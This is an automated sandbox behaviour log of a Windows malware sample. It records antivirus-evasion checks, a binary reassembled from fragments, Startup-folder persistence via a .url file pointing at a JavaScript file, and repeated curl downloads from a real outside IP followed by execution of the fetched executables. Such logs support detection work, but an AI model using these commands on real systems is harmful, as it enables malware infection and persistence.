Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nskE4F6.tmpJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican GJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com GJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.comProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"Jump to behavior
